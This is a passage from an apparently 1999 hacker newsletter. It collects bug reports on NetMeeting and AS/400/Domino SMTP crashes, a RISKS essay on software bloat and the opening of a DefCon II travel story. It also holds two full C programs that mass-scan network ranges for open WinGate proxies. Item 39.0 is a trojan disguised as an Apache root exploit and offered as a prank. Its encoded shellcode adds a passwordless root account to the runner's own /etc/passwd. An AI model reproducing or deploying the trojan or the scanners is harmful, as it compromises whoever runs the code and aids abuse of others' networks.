patches please include the information here.) I'm using PGP to encrypt the clipboard area. OTHER INFORMATION =========================================================================== Is there anything else you would like to tell us? Please, send me some feedback abou this bug i'm working on a solution but seems NetMeeting to use some sort of Common Clipboard to build all the share enviroments. If you ever heard abou this bug, please also let me know. Thank you. Best Regards, Wanderley Junior @HWA 35.0 IBM AS400+Domino vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 4 May 1999 08:53:14 +0200 From: Joachim Larsson <joachim.larsson@sigma.se> To: BUGTRAQ@netspace.org Subject: AS/400 Hello all. I played around with smtp on a as/400+domino machine and found two obvious bugs, then notified IBM, revieved a ptf, then posted here. 1: telnet (host) 25, then start feeding chars. After about 200-300 chars the smtp-subsystem will die, needing to be restarted. 2: change your replyto-address and fromaddress to an non-existing user/domain then mail to an non-existing user on the 400/domino. This will cause the mail to loop endlessly between the smtp-subsystem and the domino subsystem. This is for general knowledge only, trying to "force" people with 400/domino to react and secure their machines. Sincerely, --- (put your favourite signature here) ----------------------------------------------------------------------------- Date: Wed, 5 May 1999 08:52:42 -0500 From: Ryan Permeh <rrpermeh@RCONNECT.COM> To: BUGTRAQ@netspace.org Subject: Re: AS/400 Yeah, i found this a while back on non domino smtp daemons on as400's also. it's a somewhat simple solution to fix (just turn the SMTP service back on), but SMTP can be shut off across the network. i know this worked on as400 3.X, i haven't had a chance to test on any of the domino types or the 4.X OS levels Ryan ----------------------------------------------------------------------------- Date: Wed, 5 May 1999 13:34:40 +0200 From: Pavel Ahafonau <paully@IBA.COM.BY> To: BUGTRAQ@netspace.org Subject: Re: AS/400 >I played around with smtp on a as/400+domino machine and found two >obvious bugs, then notified IBM, revieved a ptf, then posted here. >1: telnet (host) 25, then start feeding chars. After about 200-300 >chars the smtp-subsystem will die, needing to be restarted. >2: change your replyto-address and fromaddress to an non-existing >user/domain then mail to an non-existing user on the 400/domino. This >will cause the mail to loop endlessly between the smtp-subsystem and the >domino subsystem. This is good known bug which is not related to AS/400 at all. This causes to die only Lotus Domino 4.6.1. I've tried to kill our Lotus Domino 4.6.4 and it still alive ~80) As for SMTP and Lotus Notes/Domino this is a big problem for it's users because there no any anti-spam protection like in Sendmail. Now we are playing with 5th Lotus Domino and there are all this bugs fixed and anti-spam implemented ~80) Best regards, Paully A. Ahafonau. International Business Alliance (http://www.iba.com.by) @HWA 36.0 Gateprobe.c Wingate Scanner ~~~~~~~~~~~~~~~~~~~~~~~~~~~ /*************************************** Gateprobe is back... Version: 2.1 fixed With lot of news features Added: -IP resolving -Scan class A -View option -File save (from misteri0) -Bug fix and code cleanup Bong bong26@hotmail.com PS: Why make a new code for just 3 lines of code changed, misteri0 ? ****************************************/ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/wait.h> #include <unistd.h> #include <signal.h> #include <stdlib.h> #include <stdio.h> #include <netdb.h> #include <errno.h> #define SA struct sockaddr #define SIN_LEN sizeof(struct sockaddr_in) #define IPV4_ADDRLEN 16 void ShowHelp(char *); int ConnectCheck(struct sockaddr_in, int),view; FILE *stream; char DestIP[15]; const char *ipv4_ntop(int, const void *, char *, size_t); const char *ipv4_showname(int , const void *, char *, size_t); int main(int argc, char *argv[]) { int i,j,k,c,status,Children=128,Timeout=7,class; char *NetworkID,*num3; struct sockaddr_in DestAddress; if(argc < 3) ShowHelp(argv[0]); NetworkID = argv[1]; num3=argv[2]; class=atoi(num3); while((c = getopt(argc, argv, "vp:c:t:")) != -1) { switch(c) { case 'v': view = 1; break; case 'c': Children = atoi(optarg); break; case 't': Timeout = atoi(optarg); break; } } if(Children < 1) ShowHelp(argv[0]); if(Timeout < 1) ShowHelp(argv[0]); if(class < 1) ShowHelp(argv[0]); if (class > 3) ShowHelp(argv[0]); if (class==1){ fprintf(stderr, "Scanning %s.*.*.*:23 children:%i,timeout:%i\n\n", NetworkID,Children, Timeout); for(k = 1; k < 256; k++) { for(j = 1; j < 256; j++) { for(i = 1; i < Children; i++) { sprintf(DestIP, "%s.%d.%d.%d", NetworkID,k,j, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } for(i = Children + 1; i < 256; i++) { wait(&status); sprintf(DestIP, "%s.%d.%d.%d", NetworkID,k,j,i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } } } } if (class==2){ fprintf(stderr, "Scanning %s.*.*:23 children:%i,timeout:%i\n\n", NetworkID,Children, Timeout); for(j = 1; j < 256; j++) { for(i = 1; i < Children; i++) { sprintf(DestIP, "%s.%d.%d", NetworkID,j,i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } for(i = Children + 1; i < 256; i++) { wait(&status); sprintf(DestIP, "%s.%d.%d", NetworkID,j,i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } } } if (class==3){ fprintf(stderr, "Scanning %s.*:23 children:%i,timeout:%i\n\n", NetworkID,Children, Timeout); DestAddress.sin_family = AF_INET; DestAddress.sin_port = htons(23); for(i = 1; i < Children; i++) { sprintf(DestIP, "%s.%d", NetworkID, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } for(i = Children + 1; i < 256; i++) { wait(&status); sprintf(DestIP, "%s.%d", NetworkID, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout); } for(;;) { if((waitpid(-1, &status, WNOHANG) == -1) && (errno == ECHILD)) exit(EXIT_SUCCESS); } } } int ConnectCheck(struct sockaddr_in DestAddr, int Timeout) { int result,ret,SocketFD; char Hostname[60],buffer1[64]; if (view==1) printf("%s\n",DestIP); if((SocketFD = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit(EXIT_FAILURE); alarm(Timeout); result = connect(SocketFD, (SA *)&DestAddr, SIN_LEN); if (!result) { alarm(Timeout); memset(buffer1, '\0', 64); if ((ret = read(SocketFD, buffer1, 64)) > 0) { ret = read(SocketFD, buffer1, 64); if(!(memcmp(buffer1, "WinGate>", 8)) || !(memcmp(buffer1, "Too man", 7))) { printf("Wingate found: %s\n\a", ipv4_showname(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59)); stream = fopen("wingatelist.txt","a"); fprintf(stream,"%s\n", ipv4_showname(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59)); fclose(stream); }} close(SocketFD); } exit(EXIT_SUCCESS); } const char * ipv4_ntop(int family, const void *addrptr, char *strptr, size_t len) { const u_char *p = (const u_char *)addrptr; if(family == AF_INET) { char temp[IPV4_ADDRLEN]; snprintf(temp, sizeof(temp), "%d.%d.%d.%d", p[0], p[1], p[2], p[3]); if(strlen(temp) >= len) { return(NULL); } strcpy(strptr, temp); return(strptr); } return(NULL); } const char * ipv4_showname(int family, const void *addrptr, char *strptr, size_t len) { struct hostent *hentry; size_t aflen; if(family == AF_INET) aflen = 4; else { return(NULL); } if((hentry = gethostbyaddr(addrptr, aflen, family)) != NULL) { if(strlen(hentry->h_name) < len) { strcpy(strptr, hentry->h_name); return(strptr); } } return(ipv4_ntop(family, addrptr, strptr, len)); } void ShowHelp(char *argv0) { printf("\nBong Wingate scanner 2.1\n"); printf("Usage: %s <network> <class> [option]\n",argv0); printf("Class: 1 --> A network ID <X> \n"); printf(" 2 --> B network ID <X.X> \n"); printf(" 3 --> C network ID <X.X.X> \n"); printf(" [-c <children>]\tmaximum simultaneous children\n"); printf(" [-t <timeout>] \tseconds before connection timeout\n"); printf(" [-v] \tdebug mode view the IP to scan\n\n"); exit (EXIT_FAILURE); } @HWA 37.0 Gatescan20.c Wingate Scanner by Misteri0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /*************************[GateScan20.C]************************** * Based on the bong's code <-- helped a shitload * * added... * * - cleaned the code up a little bit * * - now logs all wingate servers * * - added the portscanner * * [MAJOR PROPS GO TO:] * * codesearc, ]{ewl, Punk182, Nforcer, bong, S-y-S * * #ehforce@unet, #c@unet, Sslash, as2r|azz, funkey * * MAJOR thanx to packet storm security for posting this * * up. thanx to SIN(Self Induced Negativity member Hogs_head* * [ANTI PROPS GO TO:[I've got my reasons...]] * * #fts(2) <-- never really liked them :P * * #wicked, Ellison, fuCKfaCe (Don't have many enemies...) * *************************[GateScan20.C]************************** */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/wait.h> #include <unistd.h> #include <signal.h> #include <stdlib.h> #include <stdio.h> #include <netdb.h> #include <errno.h> #define HIGH_PORT 1024 #define SA struct sockaddr #define SIN_LEN sizeof(struct sockaddr_in) #define IPV4_ADDRLEN 16 #define cl "[0m" #define mag "[35m" #define cyn "[36m" #define wht "[37m" #define hbl "[1;30m" #define hmag "[1;35m" #define hcyn "[1;36m" #define hwh "[1;37m" void ShowVer(); /* Portscanner */ void portscan(char *the_ip) { struct hostent *scand; struct sockaddr_in scan; int sck; int c, portnum; ShowVer(); printf("Scanning....\n"); for(portnum=1; portnum<HIGH_PORT; portnum++){ if(isdigit(*the_ip)){ scan.sin_addr.s_addr = inet_addr(the_ip); } else{ scand = gethostbyname(the_ip); strncpy((char *)&scan.sin_addr, (char *)scand->h_addr, sizeof(scan.sin_addr)); } scan.sin_family = AF_INET; scan.sin_port = htons(portnum); sck = socket(AF_INET, SOCK_STREAM, 0); if(sck < 0){ printf("Socket cannot be established!\n"); } c = connect(sck, (struct sockaddr *)&scan, sizeof(scan)); /* connect the socket */ if(c < 0){ } else{ printf("\t [%s]:%d\n",the_ip,portnum); } shutdown(sck, 2); } close(sck); } void ShowHelp(char *, char *); void ShowVer() { fprintf(stderr, "[%sG%sateScan%s.%sC%s[%smisteri0%s%s@%sunet]]\n",cyn,mag,hbl,cyn,cl,hwh,cl,cyn,cl); } int ConnectCheck(struct sockaddr_in, int, int); const char *ipv4_ntop(int, const void *, char *, size_t); const char *ipv4_showname(int , const void *, char *, size_t); FILE *stream; /* Declare the Ol' FILE STREAM */ int main(int argc, char *argv[]) { int i,j=0,status,Children=128,Timeout=7,Resolve=0,class=0; char DestIP[15],*NetworkID,c,*num3; struct sockaddr_in DestAddress; if(atoi(argv[2])==3) { portscan(argv[1]); } if(argc < 3) ShowHelp(argv[0], ""); NetworkID = argv[1]; num3=argv[2]; class=atoi(num3); opterr = 0; while((c = getopt(argc, argv, "Rp:C:t:")) != -1) { switch(c) { case 'R': Resolve = -1; break; case 'C': Children = atoi(optarg); break; case 't': Timeout = atoi(optarg); break; case '?': ShowHelp(argv[0], "ERROR: unrecognized option"); break; } } if(Children < 1) ShowHelp(argv[0], "ERROR: invalid number of children"); if(Timeout < 1) ShowHelp(argv[0], "ERROR: invalid timeout"); ShowVer(); if (class==1) fprintf(stderr, "Scanning %s.*.*:23 children:%i, timeout:%i\n\n", NetworkID,Children, Timeout); if (class==2) fprintf(stderr, "Scanning %s.*:23 children:%i, timeout:%i\n\n",NetworkID, Children, Timeout); DestAddress.sin_family = AF_INET; DestAddress.sin_port = htons(23); if (class==1){ for(j = 0; j < 256; j++) { for(i = 0; i < Children; i++) { sprintf(DestIP, "%s.%d.%d", NetworkID,j, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve); } for(i = Children + 1; i < 256; i++) { wait(&status); /* wait till a child dies to make another */ sprintf(DestIP, "%s.%d.%d", NetworkID,j, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve); } } } if (class==2){ for(i = 0; i < Children; i++) { sprintf(DestIP, "%s.%d", NetworkID, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve); } for(i = Children + 1; i < 256; i++) { wait(&status); /* wait till a child dies to make another */ sprintf(DestIP, "%s.%d", NetworkID, i); inet_aton(DestIP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve); } for(;;) { if((waitpid(-1, &status, WNOHANG) == -1) && (errno == ECHILD)) exit(EXIT_SUCCESS); } } } int ConnectCheck(struct sockaddr_in DestAddr, int Timeout, int Resolve) { int result,ret,SocketFD; char Hostname[60],buffer1[64]; if((SocketFD = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit (EXIT_FAILURE); alarm(Timeout); result = connect(SocketFD, (SA *)&DestAddr, SIN_LEN); if (!result) { alarm(Timeout); memset(buffer1, '\0', 64); if ((ret = read(SocketFD, buffer1, 64)) > 0) { ret = read(SocketFD, buffer1, 64); if(!(memcmp(buffer1, "WinGate>", 8)) || !(memcmp(buffer1, "Too man", 7))) { stream = fopen("wingatelist.txt","a"); printf("Wingate found: %s\n\a",ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59)); fprintf(stream,"%s\n",ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59)); fclose(stream); }} close(SocketFD); } exit(EXIT_SUCCESS); } const char * ipv4_ntop(int family, const void *addrptr, char *strptr, size_t len) { const u_char *p = (const u_char *)addrptr; if(family == AF_INET) { char temp[IPV4_ADDRLEN]; snprintf(temp, sizeof(temp), "%d.%d.%d.%d", p[0], p[1], p[2], p[3]); if(strlen(temp) >= len) { errno = ENOSPC; return(NULL); } strcpy(strptr, temp); return(strptr); } errno = EAFNOSUPPORT; return(NULL); } const char * ipv4_showname(int family, const void *addrptr, char *strptr, size_t len) { struct hostent *hentry; size_t aflen; if(family == AF_INET) aflen = 4; else { errno = EAFNOSUPPORT; return(NULL); } if((hentry = gethostbyaddr(addrptr, aflen, family)) != NULL) { if(strlen(hentry->h_name) < len) { strcpy(strptr, hentry->h_name); return(strptr); } } return(ipv4_ntop(family, addrptr, strptr, len)); } void ShowHelp(char *argv0, char *ErrMsg) { ShowVer(); printf("v2.0 now includes intergrated portscanner\n"); printf("Based bong's <bong26@hotmail.com> code\n"); printf("Output of wingate servers will be written in wingatelist.txt\n"); printf("Usage: %s <network> <class> [option]\n",argv0); printf(" class: 1 class b network ID <x.x> \n"); printf(" 2 class c network ID <x.x.x>\n"); printf(" 3 portscan the host...\n"); printf(" [-C <children>]\tmaximum simultaneous children\n"); printf(" [-t <timeout>] \tseconds before connection timeout\n\n"); exit (EXIT_FAILURE); } @HWA 38.0 The BloatWare Debate ~~~~~~~~~~~~~~~~~~~~ Date: Sun, 02 May 1999 16:12:13 +0000 >From: main@radsoft.net (RA Downes) Subject: Re: Bloatware Debate (Downes, RISKS-20.35) A certain "Johnny" has written to me from Microsoft because of my posting in RISKS-20.35 about MS bloat. The tone was a thinly disguised threat. In his opening, "Johnny" stated that the "bloat" of MS RegClean was due no doubt to having static links. Discussing the sweeping ramifications of such a statement is unnecessary here. The mind boggles, it is sufficient to state. The MSVC runtime is a mere 250,000 bytes and in fact is not statically linked anyway to MS RegClean, AFAIK [as far as I know]. MS RegClean is an MFC app and will by default use the dynamically linked MFC libraries. And even if its static code links were an overhead here they would add but a small fraction of the total bloat, say 40KB at most. For whatever reason, I decided to download the latest version of MS RegClean >from BHS again and pluck it apart. This is what I found. I have tried - and it has been difficult - to keep subjective comments out of this report. Current Status of RegClean Version 4.1a Build 7364.1 ==================================================== Image Size (Unzipped and ready to run): 837,632 bytes (818KB) ============================================================= (Subjective comment removed.) Import Tables ============= The import section in the PE header. This gives an indication of just how (in)effective the use of Bjarne's C++ has been. In this case, the verdict is: "pretty horrible". A walloping 7,680 bytes are used for the names of the relocatable Win32 imports. These are the actual names of the functions (supposedly) called. MS RegClean does not call most of these functions - they remain because an MFC template was originally used, most likely borrowed from another application, and it was never "cleaned". This is corroborated by what is found among the "Windows resources": over half a dozen standard menus, assorted graphic images, print preview resources, etc. that have nothing to do with the application at hand. Resources ========= Please understand that resources not only bloat an executable with their own size, but with additional reference data, in other words the bloat factor of an unused or bad resource is always somewhat larger than the size of the bloating resource itself. Accelerators ============ Sixteen (16) unused accelerators from an MFC template were found: Copy, New, Open, Print, Save, Paste, "Old Undo", "Old Cut", Help, Context Help, "Old Copy", "Old Insert", Cut, Undo, Page Up, Page Down. MS RegClean uses only one accelerator itself, not listed here. Bitmaps ======= This was a particularly sorry lot. The main bloat here was a splash screen bitmap weighing in (no RLE compression of course) at over 150KB. Further, Ctl32 static library bitmaps were found, meaning MS RegClean is still linking with the old Ctl32v2 static library which was obsolete five years ago and which automatically adds another 41KB to the image size. Cursors ======= Six (6) cursors were found, none of which have anything to do with this application. Dialogs ======= A very messy chapter indeed. MS RegClean walks around with eighteen (18) hidden dialogs, of which only one or at the most two are ever used. The others are just - you took the words out of my mouth - junk. The findings (read it and weep): *) Eleven (11) empty dialogs with the caption "My Page" and the static text "Todo", all identical, all empty, and of course all unused. This is a wonder in and of itself. *) The main "wizard" dialog actually used by the application is left with comment fields to help the programmers reference the right controls in their code (subjective comment removed). *) A "RegClean Options" dialog which AFAIK is never used. *) A "New (Resource)" dialog, probably a part of the development process, just stuffed in the stomach at sew-up time and left there for posterity. *) A "Printing in Progress" dialog. *) A "Print Preview" control bar dialog. Icons ===== MS RegClean has three icons, all with images of 48x48 in 256 colors (of course). The funniest thing here is that the authors of MS RegClean have extracted the default desktop icon from shell32.dll, which is available at runtime as a resident resource anyway and at no image bloat overhead at all, and included it in toto in their executable. Menus ===== MS RegClean has eight (8) menus, at least half of these are simply junk left around by the MFC template. Another menu indicates that the authors of RegClean have in fact worked from an internal Microsoft Registry tool - rather bloated in itself it seems. String Table(s) =============== Actually it need only be one string table, but Microsoft itself has never learned this. The findings here were atrocious. And you must remember that strings stored in a string table are stored in Unicode, which means that their bloat automatically doubles. Further, MS's way of indexing strings in a string table means a 512 byte header block must be created for every string grouping, and strings are grouped according to the high 12 bits of their numerical identifiers (yes they are 16-bit WORD identifiers). Meaning indiscriminate or random numbering of string table entries will make an otherwise innocent application literally explode. 347 (three hundred forty seven, yep, your video driver is not playing tricks on you) string table entries were found in MS RegClean, including 16 identical string entries with the MS classic "Open this document" as well as archaic MFC template toggle keys texts which are not used here (or almost anywhere else today). Most of these strings have - of course - nothing to do with the application at hand. Toolbars ======== Toolbars are a funny MS way of looking at glyph bitmaps for use in toolbar controls. MS RegClean has two - one which may be used by the application, and one which was part of the original MFC template and never removed. Total Accountable Resource Bloat ================================ The total accountable (i.e. what can be directly calculated at this stage) resource bloat of MS RegClean 4.1a Build 7364.1 is over 360,000 bytes (350KB). Total Accountable Code Bloat ============================ Harder to estimate, but considering that most of the code is never used, only part of an MFC template that the authors of MS RegClean lack the wherewithal to remove, the original estimate of a total necessary image size of 45KB for the entire application must still stand. In Conclusion ============= Bloat is not a technical issue, but verily a way of thinking, a "state of mind". Its cure is a simple refusal to accept, and a well directed, resounding "clean up your act and clean up your code!" PS. Send feedback on RegClean to regclean@microsoft.com RA Downes, Radsoft Laboratories http://www.radsoft.net ------------------------------ Date: Mon, 03 May 1999 01:46:36 +0000 >From: main@radsoft.net (RA Downes) Subject: Re: Bloatware Debate Bloatware is something we are very sensitized to here. The way we see it, there is no excuse, because there is no reason. I personally accepted Brian W. Kernighan's calculations back in the old days about a 10% bloat with C versus assembler because the rewards were tangible and far outweighed the bloat: you got largely (according to Steve Johnson 94%) platform independent code, saving countless man-hours of work. But ever since the popular inception of MS Windows and furthermore MS's MFC things have been way out of control. This is partly due to C++ and partly, if not largely, due to MS and their MFC itself. A typical Win16 application was 5KB, yet the same skeleton if built with the MFC back then was ten times that size. And Bjarne's words echoed in your ear: "C++ produces no noticeable overhead versus C." It simply was not so, and never will be so. With time the MFC overhead has been reduced somewhat, but programmers of today, raised on OO and C++ as opposed to what others have gone through, are simply not taught to be conservative and minimalistic. I received a letter yesterday from someone who had been reading the Risks Digest, and reported on a party he had attended some years earlier. The conversation turned inevitably toward software, and he mentioned that he often must really tweak code to get it compact and fast. Another person at the party, from you guessed it Redmond Washington, said that was *not* the way things were done there; she said that if they ever ran into performance problems, they just "threw more hardware at it." So there are several issues involved all at once, and AFAIK the only way to fight this, for stop it we must, is to expose it and make even ordinary end users understand what it's all about, and perhaps by a concerted effort we can turn back the tide. Rick Downes, Radsoft Laboratories http://www.radsoft.net ------------------------------ From Risks Digest 20.37 http://catless.ncl.ac.uk/Risks/20.37.html ftp.sri.com/risks/ @HWA 39.0 apache.c claims to be a root exploit but actually creates a shell on your box ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Burn a script kiddie; /* remote apache 1.3.4 root exploit (linux) */ #include <stdio.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> char shellcode[] = \ "\x65\x63\x68\x6f\x20\x68\x61\x6b\x72\x3a\x3a\x30\x3a" "\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20" "\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"; #define NOP 0x90 #define BSIZE 256 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s <target>\n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memory\n"); exit(1); } memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode, strlen(shellcode)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '\0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such server\n"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socket\n"); exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refused\n"); exit(1); } printf("sending exploit code...\n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!\n"); else printf("sorry, this site isn't vulnerable\n"); printf("waiting for shell.....\n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", shellcode, 0); else wait(NULL); while (1) { /* shell */ } } @HWA 40.0 Cyber-Christ meets Lady Luck. Winn Schwartau in Las Vegas (DefCon II) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml DefCon II: Las Vegas Cyber-Christ meets Lady Luck July 22-24, 1994 by Winn Schwartau Las Vegas connotes radically different images to radically different folks. The Rat Pack of Sinatra, Dean Martin and Sammy Davis Jr. elicits up the glistening self-indulgent imagery of Vegas' neon organized crime in the '50's (Ocean's Eleven displayed only minor hacking skills.) Then there's the daily bus loads of elderly nickel slot gamblers from Los Angeles and Palm Springs who have nothing better to do for twenty out of twenty four hours each day. (Their dead hus bands were golf hacks.) Midwesterners now throng to the Mississippi River for cheap gambling. Recreational vehicles of semi-trailor length from East Bullock, Montana and Euclid, Oklahoma and Benign, Ohio clog routes 80 and 40 and 10 to descend with a vengeance upon an asphalt home away from home in the parking lot of Circus Circus. By cultural demand, every Rv'er worth his salt must, at least once in his life, indulge in the depravity of Glitter Gulch. And so they come, compelled by the invisibly insidious derelict attraction of a desert Mecca whose only purpose in life is to suck the available cash from addicted visitor's electronic purses of ATM and VISA cards. (Hacker? Nah . . .) Vegas also has the distinction of being home to the largest of the largest conventions and exhibitions in the world. Comdex is the world's largest computer convention where 150,000 techno- dweebs and silk suited glib techno-marketers display their wares to a public who is still paying off the 20% per annum debt on last year's greatest new electronic gismo which is now rendered thoroughly obsolete. And the Vegas Consumer Electronic Show does for consumer electronics what the First Amendment does for pornography. (Hackers, are we getting close?) In between, hundreds upon hundreds of small conferences and conventions and sales meetings and annual excuses for excess all select Las Vegas as the ultimate host city. Whatever you want, no matter how decadent, blasphemous, illegal or immoral, at any hour, is yours for the asking, if you have cash or a clean piece of plastic. So, it comes as no surprise, that sooner or later, (and it turns out to be sooner) that the hackers of the world, the computer hackers, phone phreaks, cyber-spooks, Information Warriors, data bankers, Cyber-punks, Cypher-punks, eavesdroppers, chippers, virus writers and perhaps the occasional Cyber Christ again picked Las Vegas as the 1994 site for DefCon II. You see, hackers are like everyone else (sort of) and so they, too, decided that their community was also entitled to hold conferences and conventions. DefCon (as opposed to Xmas's HoHoCon), is the premier mid-year hacker extravaganza. Indulgence gone wild, Vegas notwithstanding if previous Cons are any example; but now put a few hundred techno-anarchists together in sin city USA, stir in liberal doses of illicit controlled pharmaceutical substances, and we have a party that Hunter Thompson would be proud to attend. All the while, as this anarchistic renegade regiment marches to the tune of a 24 hour city, they are under complete surveillance of the authorities. Authorities like the FBI, the Secret Service, telephone security . . . maybe even Interpol. And how did the "man" arrive in tow behind the techno-slovens that belong behind bars? They were invited. And so was I. Invited to speak. (Loose translation for standing up in front of hundreds of hackers and being verbally skewered for having an opinion not in 100% accordance with their own.) "C'mon, it'll be fun," I was assured by DefCon's organizer, the Dark Tangent. "Sure fired way to become mutilated monkey meat," I responded. Some hackers just can't take a joke, especially after a prison sentence and no opposite-sex sex. "No really, they want to talk to you . . ." "I bet." It's not that I dislike hackers - on the contrary. I have even let a few into my home to play with my kids. It's just that, so many of antics that hackers have precipitated at other -Cons have earned them a reputation of disdain by all, save those who remember their own non-technical adolescent shenanigans. And I guess I'm no different. I've heard the tales of depraved indifference, hotel hold-ups, government raids on folks with names similar to those who are wanted for pushing the wrong key on the keyboard and getting caught for it. I wanted to see teens and X- generation type with their eyes so star sapphire glazed over that I could trade them for chips at the craps table. Does the truth live up to the fiction? God, I hope so. It'd be downright awful and unAmerican if 500 crazed hackers didn't get into at least some serious trouble. So I go to Vegas because, because, well, it's gonna be fun. And, if I'm lucky, I might even see an alien spaceship. For you see, the party has already begun. I go to about 30 conventions and conferences a year, but rarely if ever am I so Tylonol and Aphrin dosed that I decide to go with a severe head cold. Sympomatic relief notwithstanding I debated and debated, and since my entire family was down with the same ailment I figured Vegas was as good a place to be as at home in bed. If I could survive the four and half hour plane flight without my Eustahian tubes rocketing through my ear drums and causing irreparable damage, I had it made. The flight was made tolerable becuase I scuba dive. Every few minutes I drowned out the drone of the engines by honking uncontrollably like Felix Ungerto without his aspirator. To the chagrin of my outspoken counter surveillance expert and traveling mate, Mike Peros and the rest of the first class cabin, the captain reluctantly allowed be to remain on the flight and not be expelled sans parachute somewhere over Southfork, Texas. Snort, snort. Due to extensive flirting with the two ladies across the aisle, we made the two thousand mile trek in something less than 34 minutes . . . or so it seemed. Time flies took on new meaning. For those who don't know, the Sahara Hotel is the dregs of the Strip. We were not destined for Caesar's or the MGM or any of the new multi-gazillion dollar hotel cum casinos which produce pedestrian stopping extravaganzas as an inducement to suck in little old ladies to pour endless rolls of Washington quarters in mechanical bottomless pits. The Sahara was built some 200 years ago by native slave labor whose idea of plumbing is clean sand and decorators more concerned with a mention in Mud Hut Daily than Architectural Digest. It was just as depressingly dingy and solicitly low class as it was when I forced to spend eleven days there (also with a killer case of the flu) for an extended Comdex computer show. But, hey, for a hacker show, it was top flight. "What hackers?" The desk clerk said when I asked about the show. I explained. Computer hackers: the best from all over the country. "I hear even Cyber Christ himself might appear." Her quizzical look emphasized her pause. Better to ignore a question not understood than to look stupid. "Oh, they'll be fine, We have excellent security." The security people, I found out shortly thereafter knew even less: "What's a hacker?" Too much desert sun takes its toll. Proof positive photons are bad for neurons. Since it was still only 9PM Mike and I sucked down a couple of $1 Heinekens in the casino and fought it out with Lineman's Switching Union representatives who were also having their convention at the Sahara. Good taste in hotels goes a long way. "$70,000 a year to turn a light from red to green?" we complained. "It's a tension filled job . . .and the overtime is murder." "Why a union?" "To protect our rights." "What rights?" "To make sure we don't get replaced by a computer . . ." "Yeah," I agreed. "That would be sad. No more Amtrak disasters." The crowd got ugly so we made a hasty retreat under the scrutiny of casino security to our rooms. Saved. Perhaps if I noticed or had read the original propaganda on DefCon, I might have known that nothing significant was going to take place until the following (Friday) evening I might have missed all the fun. For at around 8AM, my congestion filled cavities and throbbing head was awakened by the sound of an exploding toilet. It's kind of hard to explain what this sounds like. Imagine a toilet flushing through a three megawatt sound system at a Rolling Stones concert. Add to that the sound of a hundred thousand flue victims standing in an echo chamber cleansng their sinuses into a mountain of Kleenex while three dozen football referees blow their foul whistles in unison, and you still won't come close to the sheer cacophonous volume that my Saharan toilet exuded from within its bowels. And all for my benefit. The hotel manager thought I was kidding. "What do you mean exploded?" "Which word do you not understand?" I growled in my early morning sub-sonic voice. "If you don't care, I don't." My bed was floating. Three or maybe 12 inches of water created the damnedest little tidal wave I'd ever seen, and the sight and sound of Lake Meade in room 1487 only exascerbatd the pressing need to relieve myself. I dried my feet on the extra bed linens, worried about electrocution and fell back asleep. It could have been 3 minutes or three hours later - I have no way to know - but my hypnogoic state was rudely interrupted by hotel maintenance pounding at the door with three fully operational muffler- less jack hammers. "I can't open it," I bellowed over the continual roar of my personal Vesuvius Waterfall. "Just c'mon in." The fourteenth floor hallway had to resemble an underwater coral display becuase the door opened ever so slowly.. "Holy Christ!" Choking back what would have been a painful laugh, I somehow said with a smirk, "Now you know what an exploding toilet is like." For, I swear, the next two hours three men whose English was worse than a dead Armadillo attempted to suck up the Nile River from my room and the hallway. Until that very moment in time, I didn't know that hotels were outfitted with vacuum cleaners specifically designed to vacuum water. Perhaps this is a regular event. Everyone who has ever suffered through one bitches about Vegas buffets, and even the hackers steered away from the Sahara's $1.95 "all you can 